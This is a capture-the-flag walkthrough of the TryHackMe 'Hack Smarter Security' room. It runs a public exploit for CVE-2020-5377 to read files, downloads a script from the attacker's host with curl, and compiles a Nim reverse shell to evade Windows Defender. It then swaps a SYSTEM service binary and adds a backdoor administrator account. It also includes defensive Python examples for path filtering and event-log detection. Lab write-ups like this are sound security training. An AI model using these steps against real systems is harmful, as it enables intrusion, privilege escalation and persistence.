# Hack Smarter Security

{% embed url="https://tryhackme.com/r/room/hacksmartersecurity" %}

## Recon

Let's start with an nmap scan.

{% code overflow="wrap" %}

```
┌──(kali㉿kali)-[~]
└─$ nmap -p- hacksmarter.thm              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-27 01:56 EDT
Nmap scan report for hacksmarter.thm (10.10.72.186)
Host is up (0.18s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
1311/tcp open  rxmon
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 323.05 seconds
```

{% endcode %}

{% code overflow="wrap" %}

```
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p 21,22,80,1311,3389 -T4 hacksmarter.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-27 02:04 EDT
Nmap scan report for hacksmarter.thm (10.10.72.186)
Host is up (0.17s latency).

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 06-28-23  02:58PM                 3722 Credit-Cards-We-Pwned.txt
|_06-28-23  03:00PM              1022126 stolen-passport.png
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 0d:fa:da:de:c9:dd:99:8d:2e:8e:eb:3b:93:ff:e2:6c (RSA)
|   256 5d:0c:df:32:26:d3:71:a2:8e:6e:9a:1c:43:fc:1a:03 (ECDSA)
|_  256 c4:25:e7:09:d6:c9:d9:86:5f:6e:8a:8b:ec:13:4a:8b (ED25519)
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: HackSmarterSec
|_http-server-header: Microsoft-IIS/10.0
1311/tcp open  ssl/rxmon?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 
|     Strict-Transport-Security: max-age=0
|     X-Frame-Options: SAMEORIGIN
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     vary: accept-encoding
|     Content-Type: text/html;charset=UTF-8
|     Date: Wed, 27 Mar 2024 06:04:23 GMT
|     Connection: close
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
|     <html>
|     <head>
|     <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
|     <title>OpenManage&trade;</title>
|     <link type="text/css" rel="stylesheet" href="/oma/css/loginmaster.css">
|     <style type="text/css"></style>
|     <script type="text/javascript" src="/oma/js/prototype.js" language="javascript"></script><script type="text/javascript" src="/oma/js/gnavbar.js" language="javascript"></script><script type="text/javascript" src="/oma/js/Clarity.js" language="javascript"></script><script language="javascript">
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Strict-Transport-Security: max-age=0
|     X-Frame-Options: SAMEORIGIN
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     vary: accept-encoding
|     Content-Type: text/html;charset=UTF-8
|     Date: Wed, 27 Mar 2024 06:04:29 GMT
|     Connection: close
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
|     <html>
|     <head>
|     <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
|     <title>OpenManage&trade;</title>
|     <link type="text/css" rel="stylesheet" href="/oma/css/loginmaster.css">
|     <style type="text/css"></style>
|_    <script type="text/javascript" src="/oma/js/prototype.js" language="javascript"></script><script type="text/javascript" src="/oma/js/gnavbar.js" language="javascript"></script><script type="text/javascript" src="/oma/js/Clarity.js" language="javascript"></script><script language="javascript">
| ssl-cert: Subject: commonName=hacksmartersec/organizationName=Dell Inc/stateOrProvinceName=TX/countryName=US
| Not valid before: 2023-06-30T19:03:17
|_Not valid after:  2025-06-29T19:03:17
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-03-27T06:04:55+00:00; -1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: HACKSMARTERSEC
|   NetBIOS_Domain_Name: HACKSMARTERSEC
|   NetBIOS_Computer_Name: HACKSMARTERSEC
|   DNS_Domain_Name: hacksmartersec
|   DNS_Computer_Name: hacksmartersec
|   Product_Version: 10.0.17763
|_  System_Time: 2024-03-27T06:04:50+00:00
| ssl-cert: Subject: commonName=hacksmartersec
| Not valid before: 2024-03-26T04:59:47
|_Not valid after:  2024-09-25T04:59:47
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1311-TCP:V=7.94SVN%T=SSL%I=7%D=3/27%Time=6603B6E8%P=x86_64-pc-linux
...
SF:"></script><script\x20language=\"javascript\">\r\n\x20");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.52 seconds
```

{% endcode %}

The scan shows that anonymous FTP login is allowed. Let's use it.

{% code overflow="wrap" %}

```
┌──(kali㉿kali)-[~]
└─$ ftp 10.10.72.186
Connected to 10.10.72.186.
220 Microsoft FTP Service
Name (10.10.72.186:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49735|)
150 Opening ASCII mode data connection.
06-28-23  02:58PM                 3722 Credit-Cards-We-Pwned.txt
06-28-23  03:00PM              1022126 stolen-passport.png
226 Transfer complete.
ftp> wget Credit-Cards-We-Pwned.txt
?Invalid command.
ftp> get Credit-Cards-We-Pwned.txt
local: Credit-Cards-We-Pwned.txt remote: Credit-Cards-We-Pwned.txt
229 Entering Extended Passive Mode (|||49737|)
125 Data connection already open; Transfer starting.
100% |********************************|  3722       25.81 KiB/s    00:00 ETA
226 Transfer complete.
3722 bytes received in 00:00 (23.95 KiB/s)
ftp> binary
200 Type set to I.
ftp> get stolen-passport.png
local: stolen-passport.png remote: stolen-passport.png
229 Entering Extended Passive Mode (|||49751|)
125 Data connection already open; Transfer starting.
100% |*********************************|   998 KiB  179.06 KiB/s    00:00 ETA
226 Transfer complete.
1022126 bytes received in 00:05 (170.36 KiB/s)
ftp> exit
```

{% endcode %}

To download the `.PNG` intact we have to switch to binary mode first.

`Credit-Cards-We-Pwned.txt` contains a list of credit card details.

<figure><img src="/files/kRjxD6GEBDT7MVWdJ5e2" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/10EUADp4QEPovy1SSjUo" alt=""><figcaption></figcaption></figure>

Gobuster revealed a directory called `images`, but we can't access it.

<figure><img src="/files/33NLRsaMSRdFZH1HfWpi" alt=""><figcaption></figcaption></figure>

We continue with the web service on port 1311. The Gobuster scan against this endpoint did not reveal anything. When visiting the page over plain HTTP we get the hint that TLS is required.

<figure><img src="/files/HFVqkgW5ZzTLL35vyTYI" alt=""><figcaption></figcaption></figure>

We switch to `https://hacksmartersec:1311/` and get redirected to `https://hacksmartersec:1311/OMSALogin?msgStatus=null`. We are dealing with `DELL EMC OPENMANAGE` and are presented with a login page, but let's take a look around first.

<figure><img src="/files/qQP1wwyrxLgOatrV2jTk" alt=""><figcaption></figcaption></figure>

The about page reveals more details, including the running version: `9.4.0.2`.

<figure><img src="/files/PArToxxyNf7ytMySrReF" alt=""><figcaption></figcaption></figure>

## Initial Access

As already mentioned, we are dealing with `DELL EMC OPENMANAGE` version `9.4.0.2`. `CVE-2020-5377` is known to affect this version and is explained in detail in the following articles.

{% embed url="https://www.dell.com/support/kbdoc/en-in/000176967/dsa-2020-172-dell-emc-openmanage-server-administrator-omsa-path-traversal-vulnerability" %}

{% embed url="https://rhinosecuritylabs.com/research/cve-2020-5377-dell-openmanage-server-administrator-file-read/" %}

The blog discusses vulnerabilities found in Dell OpenManage Server Administrator (OMSA) during an internal penetration test, including `CVE-2020-5377` and `CVE-2021-21514`. It details an authentication bypass and a file read vulnerability in OMSA versions `9.4.0.0` and `9.4.0.2`. The authentication bypass was deemed intended functionality.

The file read vulnerability allows arbitrary file access. A security filter meant to address it was bypassed. A proof of concept for exploiting these vulnerabilities was provided.

The blog concludes with recommendations to secure OMSA usage. PoCs can also be found via Searchsploit / `exploit-db.com`. However, these do not work in this case, because the `exploit-db` version does not include the security filter bypass of `CVE-2021-21514`.

The article links to the company's own PoC, which is also referenced on `exploit-db`. We will use it to retrieve data from the system:
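The filter story above is the general lesson of this finding: a fix that reasons about the request string rather than about where the path actually lands on disk tends to get bypassed. The following is an added illustration, not code from this write-up and not OMSA's code. The real filter that `CVE-2021-21514` bypassed is not described here, so `naive_filter()` is a hypothetical stand-in for that pattern; `safe_resolve()` shows the canonicalisation check a hardened file-serving routine should perform instead. The web root and requests are constructed for the demo.

```python
"""Added example (not from the write-up and not OMSA's code): why a string-based
path filter is a weak fix for a file-read bug, and what a canonicalisation check
looks like instead. naive_filter() is a hypothetical stand-in for the general
"clean the string" pattern; the exact OMSA filter is not described on the page.
"""
import os
import tempfile
from pathlib import Path
from typing import Dict, Optional


def naive_filter(base: str, user_path: str) -> str:
    """Hypothetical blacklist filter: strip '../' tokens, then join onto base.

    It catches the textbook traversal but still trusts the remaining string;
    os.path.join() discards `base` entirely when the second argument is absolute.
    """
    cleaned = user_path.replace("../", "").replace("..\\", "")
    return os.path.normpath(os.path.join(base, cleaned))


def safe_resolve(base: str, user_path: str) -> Optional[Path]:
    """Allow-list by canonical location.

    Reject absolute paths outright, resolve the remainder under the base
    directory (following symlinks), and accept only if the resolved result is
    still inside the resolved base. Returns None when the request is rejected.
    """
    if user_path.startswith(("/", "\\")) or Path(user_path).is_absolute():
        return None
    base_dir = Path(base).resolve()
    candidate = (base_dir / user_path).resolve()
    try:
        candidate.relative_to(base_dir)
    except ValueError:
        return None
    return candidate


def compare_filters() -> Dict[str, Dict[str, bool]]:
    """Run both approaches against the same requests inside a throwaway web root.

    For each request, 'naive_escapes' says whether naive_filter() produced a path
    outside the web root, and 'safe_accepted' whether safe_resolve() allowed it.
    """
    results: Dict[str, Dict[str, bool]] = {}
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "webroot")
        os.makedirs(base)
        Path(base, "help.html").write_text("<p>help</p>")  # the one legitimate file
        # constructed sample requests: one legitimate, two hostile
        for req in ("help.html", "../../etc/passwd", "/windows/system32/drivers/etc/hosts"):
            naive = naive_filter(base, req)
            results[req] = {
                "naive_escapes": not naive.startswith(base + os.sep),
                "safe_accepted": safe_resolve(base, req) is not None,
            }
    return results


if __name__ == "__main__":
    for req, verdict in compare_filters().items():
        print(f"{req!r:42} {verdict}")
```

Running it shows the asymmetry: the naive filter stops `../../etc/passwd` but happily returns the absolute hosts path, because `os.path.join` resets to the second argument; the resolve-and-contain check rejects both hostile requests and still serves `help.html`.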

{% @github-files/github-code-block url="https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2020-5377_CVE-2021-21514" %}

The PoC gives us arbitrary file read on the system.

```
┌──(kali㉿kali)-[~/Desktop/THM/HackSmarterSec]
└─$ python3 CVE-2020-5377.py 10.17.15.155 10.10.72.186:1311
Session: B5B7564089D15D80F946B47850C18DA4
VID: CD41F7522B9B6D42
file > /windows/system32/drivers/etc/hosts
Reading contents of /windows/system32/drivers/etc/hosts:
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost

file > 
```

We have a username and password.

<figure><img src="/files/8jmOXGCoBAiwNGyCK6Qh" alt=""><figcaption></figcaption></figure>

We can SSH using the above credentials.

<figure><img src="/files/O8xFKB0sJ1aNmIm532eQ" alt=""><figcaption></figcaption></figure>

This gives us the first flag.

<figure><img src="/files/CUj1xKXfv14DGARMPx7a" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

The system is protected by Windows Defender: WinPEAS was detected and removed from the system. The script `PrivescCheck`, which does something similar to WinPEAS, was not flagged.

```
curl http://10.17.15.155/Pcheck.ps1 -o p.ps1
```

```
. .\p.ps1; Invoke-PrivescCheck -Extended
```

<figure><img src="/files/LC04iisRoxM0sObRVAWb" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/NRNN4llteg1zQKABwbCM" alt=""><figcaption></figcaption></figure>

PrivescCheck finds a vulnerability rated `high`: the `spoofer-scheduler` service can be started and stopped by a normal user, and the service runs as `LocalSystem`. If we can replace the service executable, e.g. with a reverse shell or an executable that creates an admin account for us, we can escalate our privileges.

We confirm that we can write to `C:\Program Files (x86)\Spoofer`. We need a reverse shell executable that Windows Defender does not recognize; an msfvenom payload gets detected and deleted easily.

<figure><img src="/files/VsjYbPnL6a0Jt0COhiaR" alt=""><figcaption></figcaption></figure>

A reverse shell written in Nim can be used for this instead.

{% embed url="https://github.com/Sn1r/Nim-Reverse-Shell/blob/main/rev_shell.nim" %}

To install Nim and mingw-w64, run the following:

```
sudo apt install mingw-w64
sudo apt install nim
```

After changing the host and port in the source, we compile it:

```
┌──(kali㉿kali)-[~/Desktop/THM/HackSmarterSec]
└─$ nim c -d:mingw --app:gui --opt:speed -o:spoofer-scheduler.exe rev_shell.nim
```

<figure><img src="/files/HH1OA1SVEfPu5Qy2ajDr" alt=""><figcaption></figcaption></figure>

Once compiled, we start a Python web server and transfer the file. We first make a backup of the original binary, just to be safe.

{% code overflow="wrap" %}

```
PS C:\Program Files (x86)\Spoofer> mv .\spoofer-scheduler.exe spoofer-scheduler-backup.exe
PS C:\Program Files (x86)\Spoofer> dir


    Directory: C:\Program Files (x86)\Spoofer

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/24/2020   9:31 PM          16772 CHANGES.txt
-a----        3/27/2024   8:31 AM             16 hello.txt
-a----        7/24/2020   9:31 PM          82272 LICENSE.txt
-a----        7/24/2020   9:31 PM           3097 README.txt
-a----        7/24/2020   9:31 PM          48776 restore.exe
-a----        6/30/2023   6:57 PM            152 shortcuts.ini
-a----        7/24/2020   9:31 PM        4315064 spoofer-cli.exe
-a----        7/24/2020   9:31 PM       16171448 spoofer-gui.exe
-a----        7/24/2020   9:31 PM        4064696 spoofer-prober.exe
-a----        3/27/2024   8:39 AM         526762 spoofer-scheduler.exe
-a----        7/24/2020   9:31 PM            667 THANKS.txt
-a----        7/24/2020   9:31 PM         217416 uninstall.exe

```

{% endcode %}

Next, we stop the service and replace `spoofer-scheduler.exe` with ours.

<figure><img src="/files/7f1BWcRULPg8FKtsq1Va" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
The shell you get is very unstable and frequently times out, as shown below. We can either set up persistence or be very quick and obtain what is needed.
{% endhint %}

<figure><img src="/files/JrsXR1HOzYYqekAzZNR5" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/3oxUrs48Z7zLAYtOB4kY" alt=""><figcaption></figcaption></figure>

Our reverse shell connects; we are `NT AUTHORITY\SYSTEM` and have access to `C:\Users\Administrator`. As the challenge says, the threat actor's next targets are on the Administrator's desktop:

> Once you gain access to their server, navigate through their intricate network infrastructure, bypassing firewalls, encryption protocols, and other security layers. Locate the central repository where they store sensitive information, including their upcoming target list. Intel has reported this is located on the desktop of the Administrator user.

Let's set up persistence so we can log back in easily even if we lose our reverse shell:

```
┌──(kali㉿kali)-[~/Desktop/THM/HackSmarterSec]
└─$ nc -lvnp 80                                                                
listening on [any] 80 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.72.186] 50110
C:\Windows\system32> net user bun Hacksmarter123 /add
The command completed successfully.

C:\Windows\system32> net localgroup administrators bun /add
The command completed successfully.
```
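From the blue-team side, every step of this chain leaves an event: the `spoofer-scheduler` service being stopped and started (System log, event 7036), a local account being created (Security log, 4720) and that account being added to Administrators (4732), all performed from a SYSTEM context, where the acting subject shows up as the machine account `HACKSMARTERSEC$`. The following is an added example, not part of the write-up, of correlating those events. The log records are constructed sample data in a flattened one-JSON-object-per-line shape; the field names (`subject`, `target`, `member`, `group`, `service`, `state`) are this example's own and not a Windows export format.

```python
"""Added example (not part of the write-up): correlating the event-log trail of
a service-binary swap followed by local admin creation. SAMPLE_EVENTS is
constructed data, not a real export; field names are this example's own.
"""
import json
from datetime import datetime, timedelta, timezone
from typing import Dict, List

# Constructed sample events (not a real log export). Times are UTC.
SAMPLE_EVENTS = """
{"time": "2024-03-27T08:39:02Z", "id": 7036, "service": "spoofer-scheduler", "state": "stopped"}
{"time": "2024-03-27T08:39:40Z", "id": 7036, "service": "spoofer-scheduler", "state": "running"}
{"time": "2024-03-27T08:40:11Z", "id": 4720, "subject": "HACKSMARTERSEC$", "target": "bun"}
{"time": "2024-03-27T08:40:19Z", "id": 4732, "subject": "HACKSMARTERSEC$", "group": "Administrators", "member": "bun"}
{"time": "2024-03-27T09:15:00Z", "id": 4720, "subject": "Administrator", "target": "svc_backup"}
{"time": "2024-03-27T09:15:30Z", "id": 4732, "subject": "Administrator", "group": "Backup Operators", "member": "svc_backup"}
"""


def parse_events(text: str) -> List[Dict]:
    """Parse one JSON record per line, attach a tz-aware datetime, sort by time."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.strptime(ev["time"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def detect(events: List[Dict], window: timedelta = timedelta(minutes=10)) -> List[Dict]:
    """Two rules over the time-sorted event stream.

    account-created-by-system: a 4720 whose acting subject is a machine account
        (name ending in '$'), i.e. an account created from a SYSTEM context
        rather than interactively by an administrator.
    new-local-admin: a 4732 into Administrators within `window` of the 4720
        that created the same account, annotated with any service that was
        (re)started shortly before the account was created.
    """
    alerts: List[Dict] = []
    created_at: Dict[str, Dict] = {}
    for ev in events:
        if ev["id"] == 4720:
            created_at[ev["target"]] = ev
            if ev["subject"].endswith("$"):
                alerts.append({"rule": "account-created-by-system",
                               "account": ev["target"], "time": ev["time"]})
        elif ev["id"] == 4732 and ev["group"].lower() == "administrators":
            created = created_at.get(ev["member"])
            if created is None or not (timedelta(0) <= ev["ts"] - created["ts"] <= window):
                continue
            restarted = sorted({
                s["service"] for s in events
                if s["id"] == 7036 and s["state"] == "running"
                and timedelta(0) <= created["ts"] - s["ts"] <= window
            })
            alerts.append({"rule": "new-local-admin", "account": ev["member"],
                           "time": ev["time"], "preceded_by_service_restart": restarted})
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_EVENTS)):
        print(json.dumps(alert))
```

On the sample data the `bun` account triggers both rules and is tagged with the `spoofer-scheduler` restart that preceded it, while the `svc_backup` account created by an administrator and placed in Backup Operators raises nothing. The same correlation (service state change, then account creation, then Administrators membership, all from a machine-account subject) is what a SIEM rule for this escalation should look for.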

We can now SSH with the above credentials and find the targets for the last task of the challenge.

<figure><img src="/files/jtvjCeL7S55AUS1UzlvH" alt=""><figcaption></figcaption></figure>
